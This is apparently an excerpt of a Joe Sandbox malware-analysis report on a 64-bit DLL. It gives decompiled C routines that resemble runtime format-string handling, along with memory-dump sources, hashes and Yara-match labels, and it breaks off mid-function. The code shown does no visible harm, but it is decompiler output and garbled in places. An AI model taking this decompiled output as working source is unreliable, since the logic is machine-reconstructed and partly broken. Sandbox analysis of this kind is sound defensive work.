                                                                      			E0000000118001BAF4(void* __edx, void* __esi, long long __rbx, void* __rcx, long long __rdi, long long __rsi, void* __r8, void* __r10, signed int _a8, long long _a16, long long _a24, long long _a32) {
                                                                      				long long _v32;
                                                                      				signed long long _v40;
                                                                      				void* __rbp;
                                                                      				void* _t70;
                                                                      				void* _t74;
                                                                      				void* _t80;
                                                                      				void* _t81;
                                                                      				intOrPtr _t91;
                                                                      				signed int _t100;
                                                                      				void* _t109;
                                                                      				intOrPtr _t110;
                                                                      				signed int _t114;
                                                                      				intOrPtr _t128;
                                                                      				void* _t131;
                                                                      				signed long long _t152;
                                                                      				signed long long _t153;
                                                                      				void* _t156;
                                                                      				void* _t159;
                                                                      				void* _t162;
                                                                      
                                                                      				_t159 = __r8;
                                                                      				_a16 = __rbx;
                                                                      				_a24 = __rsi;
                                                                      				_a32 = __rdi;
                                                                      				_t131 = __rcx;
                                                                      				r14b = __edx;
                                                                      				_t91 =  *((intOrPtr*)(__rcx + 0x34));
                                                                      				r15d = 8;
                                                                      				_t109 = _t91 - 5;
                                                                      				if (_t109 > 0) goto 0x8001bbd3;
                                                                      				if (_t109 == 0) goto 0x8001bb4d;
                                                                      				_t110 = _t91;
                                                                      				if (_t110 == 0) goto 0x8001bc27;
                                                                      				if (_t110 == 0) goto 0x8001bba3;
                                                                      				if (_t110 == 0) goto 0x8001bb74;
                                                                      				if (_t110 == 0) goto 0x8001bc27;
                                                                      				if (_t91 - 0xffffffffffffffff != 1) goto 0x8001bbf3;
                                                                      				_a8 = _a8 & 0x00000000;
                                                                      				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001bc50;
                                                                      				E000000011800198C0( *(__rcx + 0x28) >> 4, __rcx, __rcx,  &_a8);
                                                                      				goto 0x8001bc55;
                                                                      				_a8 = _a8 & 0x00000000;
                                                                      				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001bb99;
                                                                      				_t70 = E00000001180017260( *(__rcx + 0x28) >> 4, __rcx, __rcx,  &_a8);
                                                                      				goto 0x8001bc55;
                                                                      				E00000001180017908(_t70, __rcx, __rcx,  &_a8, _t159);
                                                                      				goto 0x8001bc55;
                                                                      				_a8 = _a8 & 0x00000000;
                                                                      				_t114 = dil &  *(__rcx + 0x28) >> 0x00000004;
                                                                      				if (_t114 == 0) goto 0x8001bbc9;
                                                                      				_t74 = E00000001180016978( *(__rcx + 0x28) >> 4, __rcx, __rcx,  &_a8);
                                                                      				goto 0x8001bc55;
                                                                      				E00000001180016DF0(_t74, __rcx, __rcx,  &_a8, _t159);
                                                                      				goto 0x8001bc55;
                                                                      				if (_t114 == 0) goto 0x8001bb4d;
                                                                      				if (_t114 == 0) goto 0x8001bb4d;
                                                                      				if (_t114 == 0) goto 0x8001bb4d;
                                                                      				goto 0x8001bb3b;
                                                                      				_t128 =  *((intOrPtr*)(__rcx + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t128 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t128 + 0x2c)) = 0x16;
                                                                      				_v32 =  *((intOrPtr*)(__rcx + 8));
                                                                      				_v40 = _v40 & 0x00000000;
                                                                      				E00000001180013858( *((intOrPtr*)(__rcx + 8)), __rcx, __rcx,  &_a8, __rsi, _t156, _t159);
                                                                      				goto 0x8001bd05;
                                                                      				_a8 = _a8 & 0x00000000;
                                                                      				if (0 == 0) goto 0x8001bc49;
                                                                      				_t80 = E00000001180017D78( *(_t131 + 0x28) >> 4, _t131, _t131,  &_a8);
                                                                      				goto 0x8001bc55;
                                                                      				_t81 = E000000011800181E4(_t80, _t131, _t131,  &_a8, _t159);
                                                                      				goto 0x8001bc55;
                                                                      				E00000001180019D30(_t81, _t131, _t131,  &_a8);
                                                                      				if (0 == 0) goto 0x8001bc20;
                                                                      				if ( *((intOrPtr*)(_t131 + 0x470)) != 1) goto 0x8001bc6f;
                                                                      				if ( *((intOrPtr*)(_t131 + 0x474)) != 1) goto 0x8001bd03;
                                                                      				_t152 = _a8;
                                                                      				if (0 == 0) goto 0x8001bc8d;
                                                                      				if (_t152 >= 0) goto 0x8001bc8d;
                                                                      				_t153 =  ~_t152;
                                                                      				_t100 =  *(_t131 + 0x28) | 0x00000040;
                                                                      				 *(_t131 + 0x28) = _t100;
                                                                      				if ( *((intOrPtr*)(_t131 + 0x30)) >= 0) goto 0x8001bc9c;
                                                                      				 *((intOrPtr*)(_t131 + 0x30)) = 1;
                                                                      				goto 0x8001bcb3;
                                                                      				 *(_t131 + 0x28) = _t100 & 0xfffffff7;
                                                                      				_t48 = _t131 + 0x50; // 0xc8
                                                                      				E0000000118001671C(_t131, _t48,  *((intOrPtr*)(_t131 + 0x30)), _t153,  *((intOrPtr*)(_t131 + 8)));
                                                                      				if (_t153 != 0) goto 0x8001bcbc;
                                                                      				 *(_t131 + 0x28) =  *(_t131 + 0x28) & 0xffffffdf;
                                                                      				 *((char*)(_t131 + 0x4c)) = 0;
                                                                      				r8b = r14b;
                                                                      				if (_t162 != _t162) goto 0x8001bcd5;
                                                                      				E00000001180021290(0, _t131, _t153);
                                                                      				goto 0x8001bcdc;
                                                                      				E0000000118001FD18(__esi, _t131);
                                                                      				if (0 == 0) goto 0x8001bd03;
                                                                      				if ( *((intOrPtr*)(_t131 + 0x48)) == 0) goto 0x8001bcf5;
                                                                      				if ( *((char*)( *((intOrPtr*)(_t131 + 0x40)))) == 0x30) goto 0x8001bd03;
                                                                      				 *((long long*)(_t131 + 0x40)) =  *((long long*)(_t131 + 0x40)) - 1;
                                                                      				 *((char*)( *((intOrPtr*)(_t131 + 0x40)))) = 0x30;
                                                                      				 *((intOrPtr*)(_t131 + 0x48)) =  *((intOrPtr*)(_t131 + 0x48)) + 1;
                                                                      				return 1;
                                                                      			}






















                                                                      0x18001baf4
                                                                      0x18001baf4
                                                                      0x18001baf9
                                                                      0x18001bafe
                                                                      0x18001bb0f
                                                                      0x18001bb12
                                                                      0x18001bb15
                                                                      0x18001bb18
                                                                      0x18001bb1e
                                                                      0x18001bb21
                                                                      0x18001bb27
                                                                      0x18001bb29
                                                                      0x18001bb2b
                                                                      0x18001bb34
                                                                      0x18001bb39
                                                                      0x18001bb3e
                                                                      0x18001bb47
                                                                      0x18001bb54
                                                                      0x18001bb64
                                                                      0x18001bb6a
                                                                      0x18001bb6f
                                                                      0x18001bb7b
                                                                      0x18001bb8d
                                                                      0x18001bb8f
                                                                      0x18001bb94
                                                                      0x18001bb99
                                                                      0x18001bb9e
                                                                      0x18001bbaa
                                                                      0x18001bbba
                                                                      0x18001bbbd
                                                                      0x18001bbbf
                                                                      0x18001bbc4
                                                                      0x18001bbc9
                                                                      0x18001bbce
                                                                      0x18001bbd6
                                                                      0x18001bbdf
                                                                      0x18001bbe8
                                                                      0x18001bbee
                                                                      0x18001bbf3
                                                                      0x18001bbf7
                                                                      0x18001bbfa
                                                                      0x18001bc01
                                                                      0x18001bc05
                                                                      0x18001bc10
                                                                      0x18001bc15
                                                                      0x18001bc1b
                                                                      0x18001bc22
                                                                      0x18001bc2e
                                                                      0x18001bc40
                                                                      0x18001bc42
                                                                      0x18001bc47
                                                                      0x18001bc49
                                                                      0x18001bc4e
                                                                      0x18001bc50
                                                                      0x18001bc57
                                                                      0x18001bc60
                                                                      0x18001bc69
                                                                      0x18001bc74
                                                                      0x18001bc7d
                                                                      0x18001bc82
                                                                      0x18001bc84
                                                                      0x18001bc87
                                                                      0x18001bc8a
                                                                      0x18001bc91
                                                                      0x18001bc93
                                                                      0x18001bc9a
                                                                      0x18001bca7
                                                                      0x18001bcaa
                                                                      0x18001bcae
                                                                      0x18001bcb6
                                                                      0x18001bcb8
                                                                      0x18001bcbc
                                                                      0x18001bcc0
                                                                      0x18001bcc9
                                                                      0x18001bcce
                                                                      0x18001bcd3
                                                                      0x18001bcd7
                                                                      0x18001bce4
                                                                      0x18001bcea
                                                                      0x18001bcf3
                                                                      0x18001bcf5
                                                                      0x18001bcfd
                                                                      0x18001bd00
                                                                      0x18001bd1d

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c0ac6dd8cd3a216ece6a81c24de91d9768a3a647d35abb9e6ccc332cc9004ec7
                                                                      • Instruction ID: 7f9443a4bad1ae55cc33288ae8117b112d83f2ef15d379b4e2bce889cb505b97
                                                                      • Opcode Fuzzy Hash: c0ac6dd8cd3a216ece6a81c24de91d9768a3a647d35abb9e6ccc332cc9004ec7
                                                                      • Instruction Fuzzy Hash: 35518372204E4886FBA79E28C0543ED27A8F74DBDCF158215FA4A8A699CF65CA49C740
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.488615007.000001942A671000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001942A671000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1942a671000_loaddll64.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e660bb8dbd585ac44baa89714007651326a0f7485406fcacd91da596ea4a28a8
                                                                      • Instruction ID: 65a1e5702d8b7a0947c2843d41742dc03f42c2d669332e6aad8042f6d1cf3b4d
                                                                      • Opcode Fuzzy Hash: e660bb8dbd585ac44baa89714007651326a0f7485406fcacd91da596ea4a28a8
                                                                      • Instruction Fuzzy Hash: 31512870D0460ACFEF54DF98D49A5EEBBB0FB08304F104129E955B7291C7B89A4ACF96
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.488615007.000001942A671000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001942A671000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1942a671000_loaddll64.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8f0e16368c704187141b6fb0efb02278d5bc33123132ba3fd1801deba8d4faa7
                                                                      • Instruction ID: 5a964ff420aea207bccaf40d8d03adb0a768bc27e8a6a094187ca862e80300d2
                                                                      • Opcode Fuzzy Hash: 8f0e16368c704187141b6fb0efb02278d5bc33123132ba3fd1801deba8d4faa7
                                                                      • Instruction Fuzzy Hash: 8F614A70D047088BDB68CFE9D8999DEBBB0FF44304F104629E896AB294D7B89946CF45
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.488615007.000001942A671000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001942A671000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1942a671000_loaddll64.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 944917ea1874b5bb835b2d9dfc5b5994d4cfa4edd529642523b1046e02155be7
                                                                      • Instruction ID: 405d03781f5b50de62006e8156a8dc26fc7c66a28247cfa8f360b17702481e5e
                                                                      • Opcode Fuzzy Hash: 944917ea1874b5bb835b2d9dfc5b5994d4cfa4edd529642523b1046e02155be7
                                                                      • Instruction Fuzzy Hash: 1C61147090070E8BDF48DFA8C49A4EEBFB1FB58394F60411DE806A62A0D3749A95CFC5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 72%
                                                                      			E0000000118001E134(void* __edx, long long __rbx, void* __rcx, void* __rdx, long long __rsi, long long __rbp, void* __r8, void* __r10, long long _a8, long long _a16, long long _a24) {
                                                                      				long long _v16;
                                                                      				signed long long _v24;
                                                                      				intOrPtr _t87;
                                                                      				signed int _t91;
                                                                      				void* _t111;
                                                                      				intOrPtr _t112;
                                                                      				signed int _t119;
                                                                      				intOrPtr _t130;
                                                                      				void* _t134;
                                                                      				void* _t144;
                                                                      				intOrPtr _t150;
                                                                      				void* _t159;
                                                                      
                                                                      				_t159 = __r10;
                                                                      				_a8 = __rbx;
                                                                      				_a16 = __rbp;
                                                                      				_a24 = __rsi;
                                                                      				_t134 = __rcx;
                                                                      				bpl = __edx;
                                                                      				_t87 =  *((intOrPtr*)(__rcx + 0x34));
                                                                      				_t111 = _t87 - 5;
                                                                      				if (_t111 > 0) goto 0x8001e21b;
                                                                      				if (_t111 == 0) goto 0x8001e184;
                                                                      				_t112 = _t87;
                                                                      				if (_t112 == 0) goto 0x8001e26f;
                                                                      				if (_t112 == 0) goto 0x8001e1f3;
                                                                      				if (_t112 == 0) goto 0x8001e1cc;
                                                                      				if (_t112 == 0) goto 0x8001e26f;
                                                                      				if (_t87 - 0xffffffffffffffff != 1) goto 0x8001e23b;
                                                                      				_t91 =  *(__rcx + 0x28);
                                                                      				 *((intOrPtr*)(__rcx + 0x18)) =  *((intOrPtr*)(__rcx + 0x18)) + _t144;
                                                                      				if ((_t91 >> 0x00000004 & 0x00000001) == 0) goto 0x8001e1b6;
                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x18)) - 8)) >= 0) goto 0x8001e1b6;
                                                                      				 *(__rcx + 0x28) = _t91 | 0x00000040;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x30)) >= 0) goto 0x8001e29a;
                                                                      				 *((intOrPtr*)(__rcx + 0x30)) = 1;
                                                                      				goto 0x8001e2b1;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001e1ed;
                                                                      				goto 0x8001e19f;
                                                                      				goto 0x8001e19f;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t119 = dil &  *(__rcx + 0x28) >> 0x00000004;
                                                                      				if (_t119 == 0) goto 0x8001e215;
                                                                      				goto 0x8001e19f;
                                                                      				goto 0x8001e19f;
                                                                      				if (_t119 == 0) goto 0x8001e184;
                                                                      				if (_t119 == 0) goto 0x8001e184;
                                                                      				if (_t119 == 0) goto 0x8001e184;
                                                                      				goto 0x8001e172;
                                                                      				_t130 =  *((intOrPtr*)(__rcx + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t130 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t130 + 0x2c)) = 0x16;
                                                                      				_v16 =  *((intOrPtr*)(__rcx + 8));
                                                                      				_v24 = _v24 & 0x00000000;
                                                                      				E00000001180013858( *((intOrPtr*)(__rcx + 8)), __rcx, __rcx, __rdx,  *((char*)( *((intOrPtr*)(__rcx + 0x18)) - 8)), __rbp, __r8);
                                                                      				goto 0x8001e30a;
                                                                      				 *((long long*)(_t134 + 0x18)) =  *((long long*)(_t134 + 0x18)) + 8;
                                                                      				if (0 == 0) goto 0x8001e292;
                                                                      				_t150 =  *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x18)) - 8));
                                                                      				goto 0x8001e19f;
                                                                      				goto 0x8001e19f;
                                                                      				 *(_t134 + 0x28) =  *(_t134 + 0x28) & 0xfffffff7;
                                                                      				E000000011800167C4(_t134, _t134 + 0x50,  *((intOrPtr*)(_t134 + 0x30)), _t150,  *((intOrPtr*)(_t134 + 8)));
                                                                      				if (_t150 != 0) goto 0x8001e2ba;
                                                                      				 *(_t134 + 0x28) =  *(_t134 + 0x28) & 0xffffffdf;
                                                                      				 *((char*)(_t134 + 0x4c)) = 1;
                                                                      				r8b = bpl;
                                                                      				if (_t144 != 8) goto 0x8001e2d4;
                                                                      				E00000001180021E80(_t134, _t150);
                                                                      				goto 0x8001e2db;
                                                                      				E000000011800208C8( *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x18)) - 8)), _t134, _t150, _t159);
                                                                      				if (0 == 0) goto 0x8001e308;
                                                                      				if ( *((intOrPtr*)(_t134 + 0x48)) == 0) goto 0x8001e2f9;
                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x40)))) == 0x30) goto 0x8001e308;
                                                                      				 *((long long*)(_t134 + 0x40)) =  *((long long*)(_t134 + 0x40)) + 0xfffffffe;
                                                                      				 *((short*)( *((intOrPtr*)(_t134 + 0x40)))) = 0x30;
                                                                      				 *((intOrPtr*)(_t134 + 0x48)) =  *((intOrPtr*)(_t134 + 0x48)) + 1;
                                                                      				return 1;
                                                                      			}















                                                                      0x18001e134
                                                                      0x18001e134
                                                                      0x18001e139
                                                                      0x18001e13e
                                                                      0x18001e148
                                                                      0x18001e14b
                                                                      0x18001e14e
                                                                      0x18001e151
                                                                      0x18001e154
                                                                      0x18001e15a
                                                                      0x18001e15c
                                                                      0x18001e15e
                                                                      0x18001e167
                                                                      0x18001e170
                                                                      0x18001e175
                                                                      0x18001e17e
                                                                      0x18001e184
                                                                      0x18001e18c
                                                                      0x18001e1a6
                                                                      0x18001e1ab
                                                                      0x18001e1b3
                                                                      0x18001e1ba
                                                                      0x18001e1c0
                                                                      0x18001e1c7
                                                                      0x18001e1d4
                                                                      0x18001e1e4
                                                                      0x18001e1eb
                                                                      0x18001e1f1
                                                                      0x18001e1fb
                                                                      0x18001e205
                                                                      0x18001e20c
                                                                      0x18001e213
                                                                      0x18001e219
                                                                      0x18001e21e
                                                                      0x18001e227
                                                                      0x18001e230
                                                                      0x18001e236
                                                                      0x18001e23b
                                                                      0x18001e23f
                                                                      0x18001e242
                                                                      0x18001e249
                                                                      0x18001e24d
                                                                      0x18001e258
                                                                      0x18001e25d
                                                                      0x18001e263
                                                                      0x18001e26a
                                                                      0x18001e277
                                                                      0x18001e287
                                                                      0x18001e289
                                                                      0x18001e28d
                                                                      0x18001e295
                                                                      0x18001e2a5
                                                                      0x18001e2ac
                                                                      0x18001e2b4
                                                                      0x18001e2b6
                                                                      0x18001e2ba
                                                                      0x18001e2be
                                                                      0x18001e2c8
                                                                      0x18001e2cd
                                                                      0x18001e2d2
                                                                      0x18001e2d6
                                                                      0x18001e2e3
                                                                      0x18001e2ee
                                                                      0x18001e2f7
                                                                      0x18001e2f9
                                                                      0x18001e302
                                                                      0x18001e305
                                                                      0x18001e31e

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e779f3be169d3dd945fb3933c8cffb04370d240d8e8af6b622fbdd836ac6bbc0
                                                                      • Instruction ID: c958815c977cb42798c499574a409b7097a7235658130c2e0406d9aeee723404
                                                                      • Opcode Fuzzy Hash: e779f3be169d3dd945fb3933c8cffb04370d240d8e8af6b622fbdd836ac6bbc0
                                                                      • Instruction Fuzzy Hash: DC51A673600E9892E7AA8F28C0643AC37A1E35EB98F158216EF45177D9CF31DE85C780
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 73%
                                                                      			E0000000118001C324(void* __edx, long long __rbx, void* __rcx, void* __rdx, long long __rsi, long long __rbp, void* __r8, void* __r10, long long _a8, long long _a16, long long _a24) {
                                                                      				long long _v16;
                                                                      				signed long long _v24;
                                                                      				intOrPtr _t87;
                                                                      				signed int _t91;
                                                                      				void* _t111;
                                                                      				intOrPtr _t112;
                                                                      				signed int _t119;
                                                                      				intOrPtr _t130;
                                                                      				void* _t134;
                                                                      				void* _t144;
                                                                      				intOrPtr _t150;
                                                                      				void* _t160;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_a16 = __rbp;
                                                                      				_a24 = __rsi;
                                                                      				_t134 = __rcx;
                                                                      				bpl = __edx;
                                                                      				_t87 =  *((intOrPtr*)(__rcx + 0x34));
                                                                      				_t111 = _t87 - 5;
                                                                      				if (_t111 > 0) goto 0x8001c40b;
                                                                      				if (_t111 == 0) goto 0x8001c374;
                                                                      				_t112 = _t87;
                                                                      				if (_t112 == 0) goto 0x8001c45f;
                                                                      				if (_t112 == 0) goto 0x8001c3e3;
                                                                      				if (_t112 == 0) goto 0x8001c3bc;
                                                                      				if (_t112 == 0) goto 0x8001c45f;
                                                                      				if (_t87 - 0xffffffffffffffff != 1) goto 0x8001c42b;
                                                                      				_t91 =  *(__rcx + 0x28);
                                                                      				 *((intOrPtr*)(__rcx + 0x18)) =  *((intOrPtr*)(__rcx + 0x18)) + _t144;
                                                                      				if ((_t91 >> 0x00000004 & 0x00000001) == 0) goto 0x8001c3a6;
                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x18)) - 8)) >= 0) goto 0x8001c3a6;
                                                                      				 *(__rcx + 0x28) = _t91 | 0x00000040;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x30)) >= 0) goto 0x8001c48a;
                                                                      				 *((intOrPtr*)(__rcx + 0x30)) = 1;
                                                                      				goto 0x8001c4a1;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001c3dd;
                                                                      				goto 0x8001c38f;
                                                                      				goto 0x8001c38f;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t119 = dil &  *(__rcx + 0x28) >> 0x00000004;
                                                                      				if (_t119 == 0) goto 0x8001c405;
                                                                      				goto 0x8001c38f;
                                                                      				goto 0x8001c38f;
                                                                      				if (_t119 == 0) goto 0x8001c374;
                                                                      				if (_t119 == 0) goto 0x8001c374;
                                                                      				if (_t119 == 0) goto 0x8001c374;
                                                                      				goto 0x8001c362;
                                                                      				_t130 =  *((intOrPtr*)(__rcx + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t130 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t130 + 0x2c)) = 0x16;
                                                                      				_v16 =  *((intOrPtr*)(__rcx + 8));
                                                                      				_v24 = _v24 & 0x00000000;
                                                                      				E00000001180013858( *((intOrPtr*)(__rcx + 8)), __rcx, __rcx, __rdx,  *((char*)( *((intOrPtr*)(__rcx + 0x18)) - 8)), __rbp, __r8);
                                                                      				goto 0x8001c4fa;
                                                                      				 *((long long*)(_t134 + 0x18)) =  *((long long*)(_t134 + 0x18)) + 8;
                                                                      				if (0 == 0) goto 0x8001c482;
                                                                      				_t150 =  *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x18)) - 8));
                                                                      				goto 0x8001c38f;
                                                                      				goto 0x8001c38f;
                                                                      				 *(_t134 + 0x28) =  *(_t134 + 0x28) & 0xfffffff7;
                                                                      				E000000011800167C4(_t134, _t134 + 0x50,  *((intOrPtr*)(_t134 + 0x30)), _t150,  *((intOrPtr*)(_t134 + 8)));
                                                                      				if (_t150 != 0) goto 0x8001c4aa;
                                                                      				 *(_t134 + 0x28) =  *(_t134 + 0x28) & 0xffffffdf;
                                                                      				 *((char*)(_t134 + 0x4c)) = 1;
                                                                      				r8b = bpl;
                                                                      				if (_t144 != 8) goto 0x8001c4c4;
                                                                      				E00000001180021498(0, _t134, _t150, _t160);
                                                                      				goto 0x8001c4cb;
                                                                      				E0000000118001FF20( *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x18)) - 8)), _t134, _t160);
                                                                      				if (0 == 0) goto 0x8001c4f8;
                                                                      				if ( *((intOrPtr*)(_t134 + 0x48)) == 0) goto 0x8001c4e9;
                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x40)))) == 0x30) goto 0x8001c4f8;
                                                                      				 *((long long*)(_t134 + 0x40)) =  *((long long*)(_t134 + 0x40)) + 0xfffffffe;
                                                                      				 *((short*)( *((intOrPtr*)(_t134 + 0x40)))) = 0x30;
                                                                      				 *((intOrPtr*)(_t134 + 0x48)) =  *((intOrPtr*)(_t134 + 0x48)) + 1;
                                                                      				return 1;
                                                                      			}















                                                                      0x18001c324
                                                                      0x18001c329
                                                                      0x18001c32e
                                                                      0x18001c338
                                                                      0x18001c33b
                                                                      0x18001c33e
                                                                      0x18001c341
                                                                      0x18001c344
                                                                      0x18001c34a
                                                                      0x18001c34c
                                                                      0x18001c34e
                                                                      0x18001c357
                                                                      0x18001c360
                                                                      0x18001c365
                                                                      0x18001c36e
                                                                      0x18001c374
                                                                      0x18001c37c
                                                                      0x18001c396
                                                                      0x18001c39b
                                                                      0x18001c3a3
                                                                      0x18001c3aa
                                                                      0x18001c3b0
                                                                      0x18001c3b7
                                                                      0x18001c3c4
                                                                      0x18001c3d4
                                                                      0x18001c3db
                                                                      0x18001c3e1
                                                                      0x18001c3eb
                                                                      0x18001c3f5
                                                                      0x18001c3fc
                                                                      0x18001c403
                                                                      0x18001c409
                                                                      0x18001c40e
                                                                      0x18001c417
                                                                      0x18001c420
                                                                      0x18001c426
                                                                      0x18001c42b
                                                                      0x18001c42f
                                                                      0x18001c432
                                                                      0x18001c439
                                                                      0x18001c43d
                                                                      0x18001c448
                                                                      0x18001c44d
                                                                      0x18001c453
                                                                      0x18001c45a
                                                                      0x18001c467
                                                                      0x18001c477
                                                                      0x18001c479
                                                                      0x18001c47d
                                                                      0x18001c485
                                                                      0x18001c495
                                                                      0x18001c49c
                                                                      0x18001c4a4
                                                                      0x18001c4a6
                                                                      0x18001c4aa
                                                                      0x18001c4ae
                                                                      0x18001c4b8
                                                                      0x18001c4bd
                                                                      0x18001c4c2
                                                                      0x18001c4c6
                                                                      0x18001c4d3
                                                                      0x18001c4de
                                                                      0x18001c4e7
                                                                      0x18001c4e9
                                                                      0x18001c4f2
                                                                      0x18001c4f5
                                                                      0x18001c50e

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7520fa444885010e49863c5e2901d86da3ace90371f76d8304f024fc0cc30993
                                                                      • Instruction ID: 64a1831909bc35b146a3df22fb1fc606f8b45e1c22c4927ab76a2f2403be3dc7
                                                                      • Opcode Fuzzy Hash: 7520fa444885010e49863c5e2901d86da3ace90371f76d8304f024fc0cc30993
                                                                      • Instruction Fuzzy Hash: 5A51B173604A5883E7AA8F28C0547BC37A0E359BA8F15C219EF56177D8CF21DE45C785
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 73%
                                                                      			E0000000118001C510(void* __edx, long long __rbx, void* __rcx, void* __rdx, long long __rsi, long long __rbp, void* __r8, void* __r10, long long _a8, long long _a16, long long _a24) {
                                                                      				long long _v16;
                                                                      				signed long long _v24;
                                                                      				intOrPtr _t87;
                                                                      				signed int _t91;
                                                                      				void* _t111;
                                                                      				intOrPtr _t112;
                                                                      				signed int _t119;
                                                                      				intOrPtr _t130;
                                                                      				void* _t134;
                                                                      				void* _t144;
                                                                      				intOrPtr _t150;
                                                                      				void* _t160;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_a16 = __rbp;
                                                                      				_a24 = __rsi;
                                                                      				_t134 = __rcx;
                                                                      				bpl = __edx;
                                                                      				_t87 =  *((intOrPtr*)(__rcx + 0x34));
                                                                      				_t111 = _t87 - 5;
                                                                      				if (_t111 > 0) goto 0x8001c5f7;
                                                                      				if (_t111 == 0) goto 0x8001c560;
